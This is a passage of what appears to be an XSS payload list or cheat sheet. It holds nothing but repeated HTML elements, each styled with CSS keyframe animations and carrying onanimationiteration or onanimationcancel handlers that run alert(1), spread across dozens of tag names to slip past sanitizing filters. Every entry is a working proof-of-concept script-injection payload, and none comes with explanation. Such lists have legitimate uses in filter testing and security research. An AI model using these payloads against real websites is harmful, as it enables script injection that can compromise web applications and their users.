style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></html> <style>@keyframes slidein {}</style><i style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></i> <style>@keyframes slidein {}</style><iframe style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></iframe> <style>@keyframes slidein {}</style><image style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></image> <style>@keyframes slidein {}</style><img style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></img> <style>@keyframes slidein {}</style><input style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></input> <style>@keyframes slidein {}</style><ins style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ins> <style>@keyframes slidein {}</style><isindex style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></isindex> <style>@keyframes slidein {}</style><kbd style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></kbd> <style>@keyframes slidein {}</style><keygen style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></keygen> <style>@keyframes slidein {}</style><label style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></label> <style>@keyframes slidein {}</style><legend style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></legend> <style>@keyframes slidein {}</style><li style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></li> <style>@keyframes slidein {}</style><link style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></link> <style>@keyframes slidein {}</style><listing style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></listing> <style>@keyframes slidein {}</style><main style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></main> <style>@keyframes slidein {}</style><map style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></map> <style>@keyframes slidein {}</style><mark style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></mark> <style>@keyframes slidein {}</style><marquee style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></marquee> <style>@keyframes slidein {}</style><menu style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></menu> <style>@keyframes slidein {}</style><menuitem style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></menuitem> <style>@keyframes slidein {}</style><meta style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></meta> <style>@keyframes slidein {}</style><meter style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></meter> <style>@keyframes slidein {}</style><multicol style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></multicol> <style>@keyframes slidein {}</style><nav style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></nav> <style>@keyframes slidein {}</style><nextid style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></nextid> <style>@keyframes slidein {}</style><nobr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></nobr> <style>@keyframes slidein {}</style><noembed style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></noembed> <style>@keyframes slidein {}</style><noframes style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></noframes> <style>@keyframes slidein {}</style><noscript style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></noscript> <style>@keyframes slidein {}</style><object style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></object> <style>@keyframes slidein {}</style><ol style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ol> <style>@keyframes slidein {}</style><optgroup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></optgroup> <style>@keyframes slidein {}</style><option style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></option> <style>@keyframes slidein {}</style><output style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></output> <style>@keyframes slidein {}</style><p style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></p> <style>@keyframes slidein {}</style><param style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></param> <style>@keyframes slidein {}</style><picture style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></picture> <style>@keyframes slidein {}</style><plaintext style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></plaintext> <style>@keyframes slidein {}</style><pre style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></pre> <style>@keyframes slidein {}</style><progress style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></progress> <style>@keyframes slidein {}</style><q style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></q> <style>@keyframes slidein {}</style><rb style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rb> <style>@keyframes slidein {}</style><rp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rp> <style>@keyframes slidein {}</style><rt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rt> <style>@keyframes slidein {}</style><rtc style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rtc> <style>@keyframes slidein {}</style><ruby style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ruby> <style>@keyframes slidein {}</style><s style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></s> <style>@keyframes slidein {}</style><samp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></samp> <style>@keyframes slidein {}</style><script style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></script> <style>@keyframes slidein {}</style><section style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></section> <style>@keyframes slidein {}</style><select style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></select> <style>@keyframes slidein {}</style><shadow style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></shadow> <style>@keyframes slidein {}</style><slot style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></slot> <style>@keyframes slidein {}</style><small style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></small> <style>@keyframes slidein {}</style><source style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></source> <style>@keyframes slidein {}</style><spacer style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></spacer> <style>@keyframes slidein {}</style><span style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></span> <style>@keyframes slidein {}</style><strike style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></strike> <style>@keyframes slidein {}</style><strong style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></strong> <style>@keyframes slidein {}</style><style style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></style> <style>@keyframes slidein {}</style><sub style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></sub> <style>@keyframes slidein {}</style><summary style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></summary> <style>@keyframes slidein {}</style><sup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></sup> <style>@keyframes slidein {}</style><svg style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></svg> <style>@keyframes slidein {}</style><table style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></table> <style>@keyframes slidein {}</style><tbody style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tbody> <style>@keyframes slidein {}</style><td style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></td> <style>@keyframes slidein {}</style><template style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></template> <style>@keyframes slidein {}</style><textarea style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></textarea> <style>@keyframes slidein {}</style><tfoot style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tfoot> <style>@keyframes slidein {}</style><th style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></th> <style>@keyframes slidein {}</style><thead style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></thead> <style>@keyframes slidein {}</style><time style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></time> <style>@keyframes slidein {}</style><title style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></title> <style>@keyframes slidein {}</style><tr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tr> <style>@keyframes slidein {}</style><track style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></track> <style>@keyframes slidein {}</style><tt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tt> <style>@keyframes slidein {}</style><u style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></u> <style>@keyframes slidein {}</style><ul style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ul> <style>@keyframes slidein {}</style><var style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></var> <style>@keyframes slidein {}</style><video style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></video> <style>@keyframes slidein {}</style><wbr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></wbr> <style>@keyframes slidein {}</style><xmp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xmp> <style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style="position:absolute;" onanimationcancel="alert(1)"></a> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><abbr id=x style="position:absolute;" onanimationcancel="alert(1)"></abbr> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><acronym id=x style="position:absolute;" onanimationcancel="alert(1)"></acronym> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><address id=x style="position:absolute;" onanimationcancel="alert(1)"></address> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><applet id=x style="position:absolute;" onanimationcancel="alert(1)"></applet> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><area id=x style="position:absolute;" onanimationcancel="alert(1)"></area> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><article id=x style="position:absolute;" onanimationcancel="alert(1)"></article> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><aside id=x style="position:absolute;" onanimationcancel="alert(1)"></aside> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><audio id=x style="position:absolute;" onanimationcancel="alert(1)"></audio> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><b id=x style="position:absolute;" onanimationcancel="alert(1)"></b> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><base id=x style="position:absolute;" onanimationcancel="alert(1)"></base> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><basefont id=x style="position:absolute;" onanimationcancel="alert(1)"></basefont> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bdi id=x style="position:absolute;" onanimationcancel="alert(1)"></bdi> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bdo id=x style="position:absolute;" onanimationcancel="alert(1)"></bdo> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bgsound id=x style="position:absolute;" onanimationcancel="alert(1)"></bgsound> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><big id=x style="position:absolute;" onanimationcancel="alert(1)"></big> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><blink id=x style="position:absolute;" onanimationcancel="alert(1)"></blink> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><blockquote id=x style="position:absolute;" onanimationcancel="alert(1)"></blockquote> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><body id=x style="position:absolute;" onanimationcancel="alert(1)"></body> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><br id=x style="position:absolute;" onanimationcancel="alert(1)"></br> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><button id=x style="position:absolute;" onanimationcancel="alert(1)"></button> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><canvas id=x style="position:absolute;" onanimationcancel="alert(1)"></canvas> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><caption id=x style="position:absolute;" onanimationcancel="alert(1)"></caption> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><center id=x style="position:absolute;" onanimationcancel="alert(1)"></center> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><cite id=x style="position:absolute;" onanimationcancel="alert(1)"></cite> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><code id=x style="position:absolute;" onanimationcancel="alert(1)"></code> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><col id=x style="position:absolute;" onanimationcancel="alert(1)"></col> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><colgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></colgroup> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><command id=x style="position:absolute;" onanimationcancel="alert(1)"></command> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><content id=x style="position:absolute;" onanimationcancel="alert(1)"></content> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><data id=x style="position:absolute;" onanimationcancel="alert(1)"></data> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><datalist id=x style="position:absolute;" onanimationcancel="alert(1)"></datalist> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dd id=x style="position:absolute;" onanimationcancel="alert(1)"></dd> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><del id=x style="position:absolute;" onanimationcancel="alert(1)"></del> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><details id=x style="position:absolute;" onanimationcancel="alert(1)"></details> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dfn id=x style="position:absolute;" onanimationcancel="alert(1)"></dfn> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dialog id=x style="position:absolute;" onanimationcancel="alert(1)"></dialog> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dir id=x style="position:absolute;" onanimationcancel="alert(1)"></dir> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><div id=x style="position:absolute;" onanimationcancel="alert(1)"></div> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dl id=x style="position:absolute;" onanimationcancel="alert(1)"></dl> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dt id=x style="position:absolute;" onanimationcancel="alert(1)"></dt> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><element id=x style="position:absolute;" onanimationcancel="alert(1)"></element> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><em id=x style="position:absolute;" onanimationcancel="alert(1)"></em> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><embed id=x style="position:absolute;" onanimationcancel="alert(1)"></embed> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><fieldset id=x style="position:absolute;" onanimationcancel="alert(1)"></fieldset> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><figcaption id=x style="position:absolute;" onanimationcancel="alert(1)"></figcaption> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><figure id=x style="position:absolute;" onanimationcancel="alert(1)"></figure> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><font id=x style="position:absolute;" onanimationcancel="alert(1)"></font> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><footer id=x style="position:absolute;" onanimationcancel="alert(1)"></footer> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><form id=x style="position:absolute;" onanimationcancel="alert(1)"></form> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><frame id=x style="position:absolute;" onanimationcancel="alert(1)"></frame> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><frameset id=x style="position:absolute;" onanimationcancel="alert(1)"></frameset> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><h1 id=x style="position:absolute;" onanimationcancel="alert(1)"></h1> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><head id=x style="position:absolute;" onanimationcancel="alert(1)"></head> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><header id=x style="position:absolute;" onanimationcancel="alert(1)"></header> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><hgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></hgroup> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><hr id=x style="position:absolute;" onanimationcancel="alert(1)"></hr> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><html id=x style="position:absolute;" onanimationcancel="alert(1)"></html> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><i id=x style="position:absolute;" onanimationcancel="alert(1)"></i> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><iframe id=x style="position:absolute;" onanimationcancel="alert(1)"></iframe> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><image id=x style="position:absolute;" onanimationcancel="alert(1)"></image> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><img id=x style="position:absolute;" onanimationcancel="alert(1)"></img> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><input id=x style="position:absolute;" onanimationcancel="alert(1)"></input> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ins id=x style="position:absolute;" onanimationcancel="alert(1)"></ins> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><isindex id=x style="position:absolute;" onanimationcancel="alert(1)"></isindex> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><kbd id=x style="position:absolute;" onanimationcancel="alert(1)"></kbd> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><keygen id=x style="position:absolute;" onanimationcancel="alert(1)"></keygen> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><label id=x style="position:absolute;" onanimationcancel="alert(1)"></label> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><legend id=x style="position:absolute;" onanimationcancel="alert(1)"></legend> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><li id=x style="position:absolute;" onanimationcancel="alert(1)"></li> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><link id=x style="position:absolute;" onanimationcancel="alert(1)"></link> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><listing id=x style="position:absolute;" onanimationcancel="alert(1)"></listing> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><main id=x style="position:absolute;" onanimationcancel="alert(1)"></main> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><map id=x style="position:absolute;" onanimationcancel="alert(1)"></map> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><mark id=x style="position:absolute;" onanimationcancel="alert(1)"></mark> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><marquee id=x style="position:absolute;" onanimationcancel="alert(1)"></marquee> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><menu id=x style="position:absolute;" onanimationcancel="alert(1)"></menu> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><menuitem id=x style="position:absolute;" onanimationcancel="alert(1)"></menuitem> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><meta id=x style="position:absolute;" onanimationcancel="alert(1)"></meta> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><meter id=x style="position:absolute;" onanimationcancel="alert(1)"></meter> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><multicol id=x style="position:absolute;" onanimationcancel="alert(1)"></multicol> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nav id=x style="position:absolute;" onanimationcancel="alert(1)"></nav> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nextid id=x style="position:absolute;" onanimationcancel="alert(1)"></nextid> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nobr id=x style="position:absolute;" onanimationcancel="alert(1)"></nobr> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noembed id=x style="position:absolute;" onanimationcancel="alert(1)"></noembed> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noframes id=x style="position:absolute;" onanimationcancel="alert(1)"></noframes> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noscript id=x style="position:absolute;" onanimationcancel="alert(1)"></noscript> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><object id=x style="position:absolute;" onanimationcancel="alert(1)"></object> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ol id=x style="position:absolute;" onanimationcancel="alert(1)"></ol> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><optgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></optgroup> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><option id=x style="position:absolute;" onanimationcancel="alert(1)"></option> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><output id=x style="position:absolute;" onanimationcancel="alert(1)"></output> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><p id=x style="position:absolute;" onanimationcancel="alert(1)"></p> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><param id=x style="position:absolute;" onanimationcancel="alert(1)"></param> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><picture id=x style="position:absolute;" onanimationcancel="alert(1)"></picture> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><plaintext id=x style="position:absolute;" onanimationcancel="alert(1)"></plaintext> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><pre id=x style="position:absolute;" onanimationcancel="alert(1)"></pre> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><progress id=x style="position:absolute;" onanimationcancel="alert(1)"></progress> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><q id=x style="position:absolute;" onanimationcancel="alert(1)"></q> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rb id=x style="position:absolute;" onanimationcancel="alert(1)"></rb> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rp id=x style="position:absolute;" onanimationcancel="alert(1)"></rp> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rt id=x style="position:absolute;" onanimationcancel="alert(1)"></rt> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rtc id=x style="position:absolute;" onanimationcancel="alert(1)"></rtc> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ruby id=x style="position:absolute;" onanimationcancel="alert(1)"></ruby> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><s id=x style="position:absolute;" onanimationcancel="alert(1)"></s> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><samp id=x style="position:absolute;" onanimationcancel="alert(1)"></samp> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><script id=x style="position:absolute;" onanimationcancel="alert(1)"></script> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><section id=x style="position:absolute;" onanimationcancel="alert(1)"></section> <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 